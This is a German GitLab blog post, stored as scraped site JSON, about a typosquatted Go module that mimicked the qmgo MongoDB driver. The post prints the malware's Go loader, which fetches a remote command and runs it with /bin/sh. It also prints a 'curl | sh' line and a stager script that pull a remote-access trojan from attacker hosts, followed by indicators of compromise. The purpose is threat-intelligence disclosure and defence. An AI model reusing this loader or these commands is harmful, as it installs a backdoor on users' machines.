[{"data":1,"prerenderedAt":700},["ShallowReactive",2],{"/de-de/blog/gitlab-catches-mongodb-go-module-supply-chain-attack/":3,"navigation-de-de":31,"banner-de-de":450,"footer-de-de":462,"Michael Henriksen":672,"next-steps-de-de":685},{"_path":4,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"seo":8,"content":11,"config":20,"_id":24,"_type":25,"title":26,"_source":27,"_file":28,"_stem":29,"_extension":30},"/de-de/blog/gitlab-catches-mongodb-go-module-supply-chain-attack","blog",false,"",{"noIndex":6,"title":9,"description":10,"ogDescription":10,"ogTitle":9},"GitLab entdeckt MongoDB Go-Modul Supply-Chain-Angriff","Erfahre, wie GitLab einen Supply-Chain-Angriff aufgedeckt hat, der Go-Entwickler(innen) durch gefälschte MongoDB-Treiber ins Visier nahm, die persistente Backdoor-Malware bereitstellen.",{"title":9,"description":10,"authors":12,"heroImage":14,"body":15,"category":16,"tags":17,"date":19},[13],"Michael Henriksen","https://res.cloudinary.com/about-gitlab-com/image/upload/v1750098739/Blog/Hero%20Images/Blog/Hero%20Images/AdobeStock_282096522_securitycompliance.jpeg_1750098739024.jpg","Software-Supply-Chain-Angriffe über bösartige Abhängigkeiten gehören weiterhin zu den bedeutendsten Sicherheitsbedrohungen für die moderne Softwareentwicklung. Die weit verbreitete Nutzung von Open-Source-Komponenten hat es Entwicklungsteams ermöglicht, Anwendungen schnell zu erstellen, aber auch die Angriffsfläche vergrößert.\n\nDas wachsende Ökosystem von Drittanbieter-Paketen bietet zahlreiche Möglichkeiten für Angreifer, Abhängigkeiten durch Techniken wie Typosquatting, Dependency Confusion und Paket-Impersonation auszunutzen, was es für Entwickler(innen) zunehmend schwieriger macht, legitime Pakete von bösartigen Nachahmungen zu unterscheiden.\n\nUm diese Herausforderung anzugehen, hat das Vulnerability Research Team von GitLab kürzlich ein automatisiertes Erkennungssystem entwickelt, das proaktiv bösartige Abhängigkeiten in Software-Supply-Chains identifizieren soll. Das System kombiniert mehrere Erkennungstechniken, die zusammenarbeiten:\n\n* Automatisierte Typosquatting-Erkennung, die verdächtige Namensmuster identifiziert\n* Semantische Code-Analyse, die potenziell bösartige Verhaltensweisen wie Netzwerkanfragen oder Befehlsausführungen kennzeichnet\n* KI-unterstütztes initiales Screening für fortgeschrittene Payload- und Verschleierungserkennung\n\nDieser mehrschichtige Ansatz wird vom Vulnerability Research Team verwendet, um kontinuierlich neu veröffentlichte Abhängigkeiten in wichtigen Ökosystemen zu scannen und frühzeitig vor Supply-Chain-Angriffen zu warnen.\n\nMit diesem Erkennungssystem hat GitLab kürzlich einen aktiven Typosquatting-Angriff in freier Wildbahn identifiziert, der ein bösartiges MongoDB Go-Modul nutzte. Im Folgenden finden sich Details zum Angriff und dazu, wie GitLab daran arbeitet, Supply Chains sicher zu halten.\n\n## Zusammenfassung: Ein MongoDB-Modul, mit dem etwas nicht stimmt\n\nUnser Erkennungssystem hat ein neu veröffentlichtes Go-Modul namens `github.com/qiniiu/qmgo` gemeldet, das das beliebte [MongoDB](https://www.mongodb.com/)-Modul `github.com/qiniu/qmgo` genau nachahmt. Das legitime Modul beschreibt sich selbst als „Der Go-Treiber für MongoDB\" und hat in der Go-Community an Bedeutung gewonnen.\n\nUm das bösartige Modul als legitim zu tarnen, verwendete der Bedrohungsakteur einen GitHub-Benutzernamen, der fast identisch mit dem des echten Moduls war, mit einer subtilen Änderung: Sie fügten ein „i\" hinzu (`qiniu` → `qiniiu`). Für den gelegentlichen Beobachter, der durch Suchergebnisse oder Auto-Vervollständigungs-Vorschläge scrollt, wäre dieser Unterschied sehr leicht zu übersehen.\n\nDer Code des neuen Moduls war eine funktionierende Kopie des legitimen `qmgo`-Moduls. Allerdings wurde bösartiger Code in die `NewClient`-Funktion in `client.go` eingefügt, eine Funktion, die Entwickler(innen) natürlich aufrufen würden, wenn sie ihre MongoDB-Verbindung initialisieren. Das Verbergen von bösartigem Code innerhalb einer Funktion machte die Payload weniger wahrscheinlich, während potenzieller Laufzeit-Sicherheitsanalysen ausgeführt zu werden, während sichergestellt wurde, dass sie bei normaler Nutzung in echten Anwendungen ausgeführt würde.\n\nNach der Meldung des bösartigen Moduls wurde es innerhalb von etwa 19 Stunden nach unserer ersten Meldung entfernt. Der Bedrohungsakteur passte sich jedoch schnell an und veröffentlichte nur vier Tage später eine zweite Typosquatting-Version (`github.com/qiiniu/qmgo`) mit identischem bösartigem Code. Dieser Folgeangriff wurde ebenfalls erkannt und etwa eine Stunde nach der ersten Entdeckung entfernt. Die schnelle Neubereitstellung zeigt die Hartnäckigkeit dieser Angriffe und unterstreicht, warum proaktive Erkennung entscheidend ist, um Expositionsfenster zu minimieren.\n\n## Technische Tiefenanalyse: Die Schichten abziehen\n\nDer Bedrohungsakteur unternahm Schritte, um den Angriff zu verbergen. Die bösartige Payload verwendete einen mehrschichtigen Ansatz, beginnend mit einem kompakten Code-Snippet, das eine Kette von Remote-Payload-Downloads auslöste:\n\n```go\ntxt, err := script.Get(\"https://raw.githubusercontent.com/qiiniu/vue-element-admin/refs/heads/main/public/update.html\").String()\nif err == nil {\n    txt2, err := script.Get(string(strings.Replace(txt, \"\\n\", \"\", -1))).String()\n    if err == nil {\n        exec.Command(\"/bin/sh\", \"-c\", string(txt2)).Start()\n    }\n}\n```\n\nDer Angriff entfaltet sich in vier verschiedenen Schichten:\n\n**Schicht 1:** Der Code holt `update.html` aus einem anderen Repository, das dem Typosquat-Konto `qiiniu/vue-element-admin` gehört. Die Datei enthielt eine einzelne Zeile:\n\n```\nhttps://img.googlex.cloud/seed.php\n```\n\n**Schicht 2:** Der Code holt dann `https://img.googlex.cloud/seed.php`, was einen einzelnen Shell-Befehl zurückgibt, der ausgeführt wird:\n\n```bash\ncurl -s http://207.148.110.29:80/logon61.gif|sh\n```\n\n**Schicht 3:** Der Befehl weist das System an, `http://207.148.110.29:80/logon61.gif` mit curl abzurufen und die Antwort als Shell-Skript auszuführen. Das Shell-Skript lädt eine scheinbare MP3-Datei (`chainelli.mp3`) nach `/tmp/vod` herunter, macht sie ausführbar, führt sie aus und löscht sie sofort:\n\n```bash\n#!/bin/sh\nrm -rf /tmp/vod\ncurl -s http://207.148.110.29:80/chainelli.mp3 -o /tmp/vod\nchmod 777 /tmp/vod\n/tmp/vod\nrm -rf /tmp/vod\n```\n\n**Schicht 4:** Die `chainelli.mp3`-Datei ist tatsächlich eine statisch gelinkte, gestrippte ELF Go-Binärdatei, die darauf ausgelegt ist, persistenten Remote-Zugriff herzustellen. Nach der Ausführung versucht die Malware, sich mit ihrem Command-and-Control-Server bei `ellipal.spoolsv.cyou` auf Port 443 (sowohl TCP als auch UDP) zu verbinden, wobei ein benutzerdefiniertes verschlüsseltes Kommunikationsprotokoll mit einem hartcodierten RSA-Schlüssel verwendet wird. Von dort aus bietet sie dem Bedrohungsakteur Remote-Administrationsfähigkeiten:\n\n* Vollständiger Remote-Shell-Zugriff und einmalige Befehlsausführung\n* Screenshot-Aufnahmen\n* SOCKS-Proxy-Funktionalität, um Verbindungen über die kompromittierte Maschine herzustellen\n* Konfigurierbares Schlafintervall zwischen Check-ins mit dem Command-and-Control-Server zur Vermeidung von Erkennung\n* Standard-Remote-Access-Trojaner-Funktionen wie Dateisystem-Browsing und Upload/Download\n\n## Es ist zurück (schon wieder)\n\nNur vier Tage nachdem GitLab das erste bösartige Modul gemeldet und seine Entfernung beobachtet hatte, erschien `github.com/qiiniu/qmgo` – die zweite Typosquatting-Version mit identischem bösartigem Code. Diese schnelle Neubereitstellung demonstriert die Hartnäckigkeit dieser Angriffe und zeigt, wie Bedrohungsakteure sich schnell an Takedown-Bemühungen anpassen.\n\n## GitLabs Ansatz: Nadeln im Heuhaufen finden\n\nDie anfängliche Entdeckung und Beständigkeit dieses Angriffs bestätigte unseren Ansatz zur proaktiven Abhängigkeitsüberwachung und Bedrohungserkennung. GitLabs Erkennungssystem kombiniert mehrere Techniken zur Identifizierung bösartiger Abhängigkeiten:\n\n**Typosquatting-Erkennung:** GitLab überwacht neu veröffentlichte Abhängigkeiten und sucht nach Paketen, die Anzeichen verschiedener Typosquatting-Strategien zeigen.\n\n**Semantische Heuristik:** Unser System analysiert Code statisch auf Muster wie Netzwerkanfragen, Befehlsausführungen und andere für bösartige Payloads typische Verhaltensweisen.\n\n**KI-unterstützte Analyse:** Ein [Large Language Model](https://about.gitlab.com/blog/what-is-a-large-language-model-llm/) führt die anfängliche Analyse der verdächtigen Teile des Codes durch, um uns zu helfen, offensichtliche Fehlalarme auszusortieren, komplexe Payloads zu erkennen und Verschleierungstechniken zu identifizieren, die verwendet werden, um bösartige Absichten zu verbergen.\n\n**Menschliche Überprüfung:** Ein Mensch erhält eine Warnung, um den Fund zu verifizieren und eine erweiterte Analyse durchzuführen.\n\n## Empfehlungen: Persistenten Supply-Chain-Bedrohungen voraus bleiben\n\nDieser Angriff unterstreicht die anhaltenden Herausforderungen bei der Sicherung von Software-Supply-Chains. Die mehrschichtige Verschleierung und schnelle Neubereitstellung nach dem Takedown zeigen, dass Bedrohungsakteure bereit sind, erheblichen Aufwand zu investieren, um beliebte Abhängigkeiten ins Visier zu nehmen.\n\nDer schnelle Wechsel zu neuen Typosquatting-Paketen nach unserer ersten Meldung hebt eine grundlegende Schwäche in den aktuellen Ökosystemen hervor: Paketmanager entfernen bösartige Abhängigkeiten normalerweise erst, nachdem sie veröffentlicht, entdeckt und von der Community gemeldet wurden. Dieser reaktive Ansatz hinterlässt ein gefährliches Zeitfenster, in dem Entwickler(innen) unwissentlich kompromittierte Pakete konsumieren können. Proaktive Überwachungs- und Erkennungssysteme wie das von GitLab entwickelte können helfen, diese Lücke zu schließen, indem sie Bedrohungen während des Veröffentlichungsprozesses selbst identifizieren.\n\nWir haben Indicators of Compromise (IOCs) im nächsten Abschnitt bereitgestellt, die in Überwachungssystemen verwendet werden können, um diese spezifische Kampagne zu erkennen.\n\n## Indicators of Compromise\n\n| IOC                                                                                             | Beschreibung                                                                     |\n| ----------------------------------------------------------------------------------------------- | -------------------------------------------------------------------------------- |\n| `github.com/qiniiu/qmgo`                                                                        | Bösartiges Go-Modul                                                              |\n| `github.com/qiiniu/qmgo`                                                                        | Bösartiges Go-Modul                                                              |\n| `https://raw.githubusercontent.com/qiniiu/vue-element-admin/refs/heads/main/public/update.html` | Payload-Bereitstellungs-URL                                                      |\n| `https://raw.githubusercontent.com/qiiniu/vue-element-admin/refs/heads/main/public/update.html` | Payload-Bereitstellungs-URL                                                      |\n| `https://img.googlex.cloud/seed.php`                                                            | Payload-Bereitstellungs-URL                                                      |\n| `http://207.148.110.29:80/logon61.gif`                                                          | Payload-Bereitstellungs-URL                                                      |\n| `http://207.148.110.29:80/chainelli.mp3`                                                        | Payload-Bereitstellungs-URL                                                      |\n| `img.googlex.cloud`                                                                             | Payload-Bereitstellungs-Host                                                     |\n| `207.148.110.29`                                                                                | Payload-Bereitstellungs-Host                                                     |\n| `ellipal.spoolsv.cyou`                                                                          | Command & Control-Host                                                           |\n| `6ada952c592f286692c59028c5e0fc3fa589759f`                                                      | SHA-1-Prüfsumme der chainelli.mp3 Remote-Administrations-Malware                 |\n| `8ae533e2d1d89c871908cbcf5c7d89c433d09b2e7f7d4ade3aef46c55b66509c`                              | SHA-256-Prüfsumme der chainelli.mp3 Remote-Administrations-Malware               |\n| `/tmp/vod`                                                                                      | Temporärer Download-Speicherort der chainelli.mp3 Remote-Administrations-Malware |\n\n## Wie GitLab hilft, die Software-Supply-Chain zu sichern\n\nBösartige Abhängigkeiten wie der MongoDB Go-Modul-Angriff zeigen, warum die Sicherung der Software-Supply-Chain mehr als nur CVE-Überwachung erfordert. GitLabs DevSecOps-Plattform umfasst [Application Security Testing](https://docs.gitlab.com/user/application_security/secure_your_application/)-Scanner wie Software Composition Analysis im Entwicklungslebenszyklus, die Teams helfen, verwundbare oder bösartige Pakete zu erkennen, bevor sie die Produktion erreichen.\n\nGepaart mit Forschungsbemühungen wie dieser zielt GitLab darauf ab, Entwickler(inne)n zu ermöglichen, Anwendungen zu erstellen, die von Anfang an sicher sind, ohne die Entwicklungsgeschwindigkeit zu beeinträchtigen.\n\n## Zeitlinie\n\n* **2025-06-01T09:31:** GitLab meldet `github.com/qiniiu/qmgo` an Go Security\n* **2025-06-01T09:43:** GitLab meldet `github.com/qiniiu/qmgo` an GitHub\n* **2025-06-01T10:14:** GitLab meldet `ellipal.spoolsv.cyou` (`188.166.213.194`) an den IP-Block-Eigentümer\n* **2025-06-02T04:03:** Go Security entfernt `github.com/qiniiu/qmgo`\n* **2025-06-02T09:57:** Der IP-Block-Eigentümer sperrt `188.166.213.194`\n* **2025-06-03T09:15:** GitHub sperrt `github.com/qiniiu`\n* **2025-06-05T17:15:** GitLab meldet `github.com/qiiniu/qmgo` an Go Security\n* **2025-06-05T17:33:** GitLab meldet `github.com/qiiniu/qmgo` an GitHub\n* **2025-06-05T17:45:** Go Security entfernt `github.com/qiiniu/qmgo`\n* **2025-06-06T12:25:** GitHub sperrt `github.com/qiiniu`","security",[16,18],"product","2025-06-30",{"featured":21,"template":22,"slug":23},true,"BlogPost","gitlab-catches-mongodb-go-module-supply-chain-attack","content:de-de:blog:gitlab-catches-mongodb-go-module-supply-chain-attack.yml","yaml","Gitlab Catches Mongodb Go Module Supply Chain Attack","content","de-de/blog/gitlab-catches-mongodb-go-module-supply-chain-attack.yml","de-de/blog/gitlab-catches-mongodb-go-module-supply-chain-attack","yml",{"_path":32,"_dir":33,"_draft":6,"_partial":6,"_locale":7,"data":34,"_id":446,"_type":25,"title":447,"_source":27,"_file":448,"_stem":449,"_extension":30},"/shared/de-de/main-navigation","de-de",{"logo":35,"freeTrial":40,"sales":45,"login":50,"items":55,"search":387,"minimal":423,"duo":437},{"config":36},{"href":37,"dataGaName":38,"dataGaLocation":39},"/de-de/","gitlab logo","header",{"text":41,"config":42},"Kostenlose Testversion anfordern",{"href":43,"dataGaName":44,"dataGaLocation":39},"https://gitlab.com/-/trial_registrations/new?glm_source=about.gitlab.com&glm_content=default-saas-trial/","free trial",{"text":46,"config":47},"Vertrieb kontaktieren",{"href":48,"dataGaName":49,"dataGaLocation":39},"/de-de/sales/","sales",{"text":51,"config":52},"Anmelden",{"href":53,"dataGaName":54,"dataGaLocation":39},"https://gitlab.com/users/sign_in/","sign in",[56,100,198,203,308,368],{"text":57,"config":58,"cards":60,"footer":83},"Plattform",{"dataNavLevelOne":59},"platform",[61,67,75],{"title":57,"description":62,"link":63},"Die umfassendste KI-basierte DevSecOps-Plattform",{"text":64,"config":65},"Erkunde unsere Plattform",{"href":66,"dataGaName":59,"dataGaLocation":39},"/de-de/platform/",{"title":68,"description":69,"link":70},"GitLab Duo (KI)","Entwickle Software schneller mit KI in jeder Phase der Entwicklung",{"text":71,"config":72},"Lerne GitLab Duo kennen",{"href":73,"dataGaName":74,"dataGaLocation":39},"/de-de/gitlab-duo/","gitlab duo ai",{"title":76,"description":77,"link":78},"Gründe, die für GitLab sprechen","10 Gründe, warum Unternehmen sich für GitLab entscheiden",{"text":79,"config":80},"Mehr erfahren",{"href":81,"dataGaName":82,"dataGaLocation":39},"/de-de/why-gitlab/","why gitlab",{"title":84,"items":85},"Erste Schritte mit",[86,91,96],{"text":87,"config":88},"Platform Engineering",{"href":89,"dataGaName":90,"dataGaLocation":39},"/de-de/solutions/platform-engineering/","platform engineering",{"text":92,"config":93},"Entwicklererfahrung",{"href":94,"dataGaName":95,"dataGaLocation":39},"/de-de/developer-experience/","Developer experience",{"text":97,"config":98},"MLOps",{"href":99,"dataGaName":97,"dataGaLocation":39},"/de-de/topics/devops/the-role-of-ai-in-devops/",{"text":101,"left":21,"config":102,"link":104,"lists":108,"footer":180},"Produkt",{"dataNavLevelOne":103},"solutions",{"text":105,"config":106},"Alle Lösungen anzeigen",{"href":107,"dataGaName":103,"dataGaLocation":39},"/de-de/solutions/",[109,135,158],{"title":110,"description":111,"link":112,"items":117},"Automatisierung","CI/CD und Automatisierung zur Beschleunigung der Bereitstellung",{"config":113},{"icon":114,"href":115,"dataGaName":116,"dataGaLocation":39},"AutomatedCodeAlt","/de-de/solutions/delivery-automation/","automated software delivery",[118,122,126,131],{"text":119,"config":120},"CI/CD",{"href":121,"dataGaLocation":39,"dataGaName":119},"/de-de/solutions/continuous-integration/",{"text":123,"config":124},"KI-unterstützte Entwicklung",{"href":73,"dataGaLocation":39,"dataGaName":125},"AI assisted development",{"text":127,"config":128},"Quellcodeverwaltung",{"href":129,"dataGaLocation":39,"dataGaName":130},"/de-de/solutions/source-code-management/","Source Code Management",{"text":132,"config":133},"Automatisierte Softwarebereitstellung",{"href":115,"dataGaLocation":39,"dataGaName":134},"Automated software delivery",{"title":136,"description":137,"link":138,"items":143},"Sicherheit","Entwickle schneller, ohne die Sicherheit zu gefährden",{"config":139},{"href":140,"dataGaName":141,"dataGaLocation":39,"icon":142},"/de-de/solutions/security-compliance/","security and compliance","ShieldCheckLight",[144,148,153],{"text":145,"config":146},"Sicherheit und Compliance",{"href":140,"dataGaLocation":39,"dataGaName":147},"Security & Compliance",{"text":149,"config":150},"Schutz der Software-Lieferkette",{"href":151,"dataGaLocation":39,"dataGaName":152},"/de-de/solutions/supply-chain/","Software supply chain security",{"text":154,"config":155},"Compliance und Governance",{"href":156,"dataGaLocation":39,"dataGaName":157},"/de-de/solutions/continuous-software-compliance/","Compliance and governance",{"title":159,"link":160,"items":165},"Bewertung",{"config":161},{"icon":162,"href":163,"dataGaName":164,"dataGaLocation":39},"DigitalTransformation","/de-de/solutions/visibility-measurement/","visibility and measurement",[166,170,175],{"text":167,"config":168},"Sichtbarkeit und Bewertung",{"href":163,"dataGaLocation":39,"dataGaName":169},"Visibility and Measurement",{"text":171,"config":172},"Wertstrommanagement",{"href":173,"dataGaLocation":39,"dataGaName":174},"/de-de/solutions/value-stream-management/","Value Stream Management",{"text":176,"config":177},"Analysen und Einblicke",{"href":178,"dataGaLocation":39,"dataGaName":179},"/de-de/solutions/analytics-and-insights/","Analytics and insights",{"title":181,"items":182},"GitLab für",[183,188,193],{"text":184,"config":185},"Enterprise",{"href":186,"dataGaLocation":39,"dataGaName":187},"/de-de/enterprise/","enterprise",{"text":189,"config":190},"Kleinunternehmen",{"href":191,"dataGaLocation":39,"dataGaName":192},"/de-de/small-business/","small business",{"text":194,"config":195},"den öffentlichen Sektor",{"href":196,"dataGaLocation":39,"dataGaName":197},"/de-de/solutions/public-sector/","public sector",{"text":199,"config":200},"Preise",{"href":201,"dataGaName":202,"dataGaLocation":39,"dataNavLevelOne":202},"/de-de/pricing/","pricing",{"text":204,"config":205,"link":207,"lists":211,"feature":295},"Ressourcen",{"dataNavLevelOne":206},"resources",{"text":208,"config":209},"Alle Ressourcen anzeigen",{"href":210,"dataGaName":206,"dataGaLocation":39},"/de-de/resources/",[212,245,267],{"title":213,"items":214},"Erste Schritte",[215,220,225,230,235,240],{"text":216,"config":217},"Installieren",{"href":218,"dataGaName":219,"dataGaLocation":39},"/de-de/install/","install",{"text":221,"config":222},"Kurzanleitungen",{"href":223,"dataGaName":224,"dataGaLocation":39},"/de-de/get-started/","quick setup checklists",{"text":226,"config":227},"Lernen",{"href":228,"dataGaLocation":39,"dataGaName":229},"https://university.gitlab.com/","learn",{"text":231,"config":232},"Produktdokumentation",{"href":233,"dataGaName":234,"dataGaLocation":39},"https://docs.gitlab.com/","product documentation",{"text":236,"config":237},"Best-Practice-Videos",{"href":238,"dataGaName":239,"dataGaLocation":39},"/de-de/getting-started-videos/","best practice videos",{"text":241,"config":242},"Integrationen",{"href":243,"dataGaName":244,"dataGaLocation":39},"/de-de/integrations/","integrations",{"title":246,"items":247},"Entdecken",[248,253,257,262],{"text":249,"config":250},"Kundenerfolge",{"href":251,"dataGaName":252,"dataGaLocation":39},"/de-de/customers/","customer success stories",{"text":254,"config":255},"Blog",{"href":256,"dataGaName":5,"dataGaLocation":39},"/de-de/blog/",{"text":258,"config":259},"Remote",{"href":260,"dataGaName":261,"dataGaLocation":39},"https://handbook.gitlab.com/handbook/company/culture/all-remote/","remote",{"text":263,"config":264},"TeamOps",{"href":265,"dataGaName":266,"dataGaLocation":39},"/de-de/teamops/","teamops",{"title":268,"items":269},"Vernetzen",[270,275,280,285,290],{"text":271,"config":272},"GitLab-Services",{"href":273,"dataGaName":274,"dataGaLocation":39},"/de-de/services/","services",{"text":276,"config":277},"Community",{"href":278,"dataGaName":279,"dataGaLocation":39},"/community/","community",{"text":281,"config":282},"Forum",{"href":283,"dataGaName":284,"dataGaLocation":39},"https://forum.gitlab.com/","forum",{"text":286,"config":287},"Veranstaltungen",{"href":288,"dataGaName":289,"dataGaLocation":39},"/events/","events",{"text":291,"config":292},"Partner",{"href":293,"dataGaName":294,"dataGaLocation":39},"/de-de/partners/","partners",{"backgroundColor":296,"textColor":297,"text":298,"image":299,"link":303},"#2f2a6b","#fff","Perspektiven für die Softwareentwicklung der Zukunft",{"altText":300,"config":301},"the source promo card",{"src":302},"/images/navigation/the-source-promo-card.svg",{"text":304,"config":305},"Lies die News",{"href":306,"dataGaName":307,"dataGaLocation":39},"/de-de/the-source/","the source",{"text":309,"config":310,"lists":312},"Unternehmen",{"dataNavLevelOne":311},"company",[313],{"items":314},[315,320,326,328,333,338,343,348,353,358,363],{"text":316,"config":317},"Über",{"href":318,"dataGaName":319,"dataGaLocation":39},"/de-de/company/","about",{"text":321,"config":322,"footerGa":325},"Karriere",{"href":323,"dataGaName":324,"dataGaLocation":39},"/jobs/","jobs",{"dataGaName":324},{"text":286,"config":327},{"href":288,"dataGaName":289,"dataGaLocation":39},{"text":329,"config":330},"Geschäftsführung",{"href":331,"dataGaName":332,"dataGaLocation":39},"/company/team/e-group/","leadership",{"text":334,"config":335},"Team",{"href":336,"dataGaName":337,"dataGaLocation":39},"/company/team/","team",{"text":339,"config":340},"Handbuch",{"href":341,"dataGaName":342,"dataGaLocation":39},"https://handbook.gitlab.com/","handbook",{"text":344,"config":345},"Investor Relations",{"href":346,"dataGaName":347,"dataGaLocation":39},"https://ir.gitlab.com/","investor relations",{"text":349,"config":350},"Trust Center",{"href":351,"dataGaName":352,"dataGaLocation":39},"/de-de/security/","trust center",{"text":354,"config":355},"AI Transparency Center",{"href":356,"dataGaName":357,"dataGaLocation":39},"/de-de/ai-transparency-center/","ai transparency center",{"text":359,"config":360},"Newsletter",{"href":361,"dataGaName":362,"dataGaLocation":39},"/company/contact/","newsletter",{"text":364,"config":365},"Presse",{"href":366,"dataGaName":367,"dataGaLocation":39},"/press/","press",{"text":369,"config":370,"lists":371},"Kontakt",{"dataNavLevelOne":311},[372],{"items":373},[374,377,382],{"text":46,"config":375},{"href":48,"dataGaName":376,"dataGaLocation":39},"talk to sales",{"text":378,"config":379},"Support",{"href":380,"dataGaName":381,"dataGaLocation":39},"/support/","get help",{"text":383,"config":384},"Kundenportal",{"href":385,"dataGaName":386,"dataGaLocation":39},"https://customers.gitlab.com/customers/sign_in/","customer portal",{"close":388,"login":389,"suggestions":396},"Schließen",{"text":390,"link":391},"Um Repositories und Projekte zu durchsuchen, melde dich an bei",{"text":392,"config":393},"gitlab.com",{"href":53,"dataGaName":394,"dataGaLocation":395},"search login","search",{"text":397,"default":398},"Vorschläge",[399,402,407,409,414,419],{"text":68,"config":400},{"href":73,"dataGaName":401,"dataGaLocation":395},"GitLab Duo (AI)",{"text":403,"config":404},"Code Suggestions (KI)",{"href":405,"dataGaName":406,"dataGaLocation":395},"/de-de/solutions/code-suggestions/","Code Suggestions (AI)",{"text":119,"config":408},{"href":121,"dataGaName":119,"dataGaLocation":395},{"text":410,"config":411},"GitLab auf AWS",{"href":412,"dataGaName":413,"dataGaLocation":395},"/de-de/partners/technology-partners/aws/","GitLab on AWS",{"text":415,"config":416},"GitLab auf Google Cloud",{"href":417,"dataGaName":418,"dataGaLocation":395},"/de-de/partners/technology-partners/google-cloud-platform/","GitLab on Google Cloud",{"text":420,"config":421},"Warum GitLab?",{"href":81,"dataGaName":422,"dataGaLocation":395},"Why GitLab?",{"freeTrial":424,"mobileIcon":429,"desktopIcon":434},{"text":425,"config":426},"Kostenlos testen",{"href":427,"dataGaName":44,"dataGaLocation":428},"https://gitlab.com/-/trials/new/","nav",{"altText":430,"config":431},"GitLab-Symbol",{"src":432,"dataGaName":433,"dataGaLocation":428},"/images/brand/gitlab-logo-tanuki.svg","gitlab icon",{"altText":430,"config":435},{"src":436,"dataGaName":433,"dataGaLocation":428},"/images/brand/gitlab-logo-type.svg",{"freeTrial":438,"mobileIcon":442,"desktopIcon":444},{"text":439,"config":440},"Erfahre mehr über GitLab Duo",{"href":73,"dataGaName":441,"dataGaLocation":428},"gitlab duo",{"altText":430,"config":443},{"src":432,"dataGaName":433,"dataGaLocation":428},{"altText":430,"config":445},{"src":436,"dataGaName":433,"dataGaLocation":428},"content:shared:de-de:main-navigation.yml","Main Navigation","shared/de-de/main-navigation.yml","shared/de-de/main-navigation",{"_path":451,"_dir":33,"_draft":6,"_partial":6,"_locale":7,"title":452,"button":453,"config":457,"_id":459,"_type":25,"_source":27,"_file":460,"_stem":461,"_extension":30},"/shared/de-de/banner","GitLab Duo Agent Platform ist jetzt in öffentlicher Beta!",{"text":79,"config":454},{"href":455,"dataGaName":456,"dataGaLocation":39},"/de-de/gitlab-duo/agent-platform/","duo banner",{"layout":458},"release","content:shared:de-de:banner.yml","shared/de-de/banner.yml","shared/de-de/banner",{"_path":463,"_dir":33,"_draft":6,"_partial":6,"_locale":7,"data":464,"_id":668,"_type":25,"title":669,"_source":27,"_file":670,"_stem":671,"_extension":30},"/shared/de-de/main-footer",{"text":465,"source":466,"edit":472,"contribute":477,"config":482,"items":487,"minimal":660},"Git ist eine Marke von Software Freedom Conservancy und unsere Verwendung von „GitLab“ erfolgt unter Lizenz.",{"text":467,"config":468},"Quelltext der Seite anzeigen",{"href":469,"dataGaName":470,"dataGaLocation":471},"https://gitlab.com/gitlab-com/marketing/digital-experience/about-gitlab-com/","page source","footer",{"text":473,"config":474},"Diese Seite bearbeiten",{"href":475,"dataGaName":476,"dataGaLocation":471},"https://gitlab.com/gitlab-com/marketing/digital-experience/about-gitlab-com/-/blob/main/content/","web ide",{"text":478,"config":479},"Beteilige dich",{"href":480,"dataGaName":481,"dataGaLocation":471},"https://gitlab.com/gitlab-com/marketing/digital-experience/about-gitlab-com/-/blob/main/CONTRIBUTING.md/","please contribute",{"twitter":483,"facebook":484,"youtube":485,"linkedin":486},"https://x.com/gitlab","https://www.facebook.com/gitlab","https://www.youtube.com/channel/UCnMGQ8QHMAnVIsI3xJrihhg","https://www.linkedin.com/company/gitlab-com",[488,511,566,596,630],{"title":57,"links":489,"subMenu":494},[490],{"text":491,"config":492},"DevSecOps-Plattform",{"href":66,"dataGaName":493,"dataGaLocation":471},"devsecops platform",[495],{"title":199,"links":496},[497,501,506],{"text":498,"config":499},"Tarife anzeigen",{"href":201,"dataGaName":500,"dataGaLocation":471},"view plans",{"text":502,"config":503},"Vorteile von Premium",{"href":504,"dataGaName":505,"dataGaLocation":471},"/de-de/pricing/premium/","why premium",{"text":507,"config":508},"Vorteile von Ultimate",{"href":509,"dataGaName":510,"dataGaLocation":471},"/de-de/pricing/ultimate/","why ultimate",{"title":512,"links":513},"Lösungen",[514,519,522,524,529,534,538,541,544,549,551,553,556,561],{"text":515,"config":516},"Digitale Transformation",{"href":517,"dataGaName":518,"dataGaLocation":471},"/de-de/topics/digital-transformation/","digital transformation",{"text":145,"config":520},{"href":140,"dataGaName":521,"dataGaLocation":471},"security & compliance",{"text":132,"config":523},{"href":115,"dataGaName":116,"dataGaLocation":471},{"text":525,"config":526},"Agile Entwicklung",{"href":527,"dataGaName":528,"dataGaLocation":471},"/de-de/solutions/agile-delivery/","agile delivery",{"text":530,"config":531},"Cloud-Transformation",{"href":532,"dataGaName":533,"dataGaLocation":471},"/de-de/topics/cloud-native/","cloud transformation",{"text":535,"config":536},"SCM",{"href":129,"dataGaName":537,"dataGaLocation":471},"source code management",{"text":119,"config":539},{"href":121,"dataGaName":540,"dataGaLocation":471},"continuous integration & delivery",{"text":171,"config":542},{"href":173,"dataGaName":543,"dataGaLocation":471},"value stream management",{"text":545,"config":546},"GitOps",{"href":547,"dataGaName":548,"dataGaLocation":471},"/de-de/solutions/gitops/","gitops",{"text":184,"config":550},{"href":186,"dataGaName":187,"dataGaLocation":471},{"text":189,"config":552},{"href":191,"dataGaName":192,"dataGaLocation":471},{"text":554,"config":555},"Öffentlicher Sektor",{"href":196,"dataGaName":197,"dataGaLocation":471},{"text":557,"config":558},"Bildungswesen",{"href":559,"dataGaName":560,"dataGaLocation":471},"/de-de/solutions/education/","education",{"text":562,"config":563},"Finanzdienstleistungen",{"href":564,"dataGaName":565,"dataGaLocation":471},"/de-de/solutions/finance/","financial 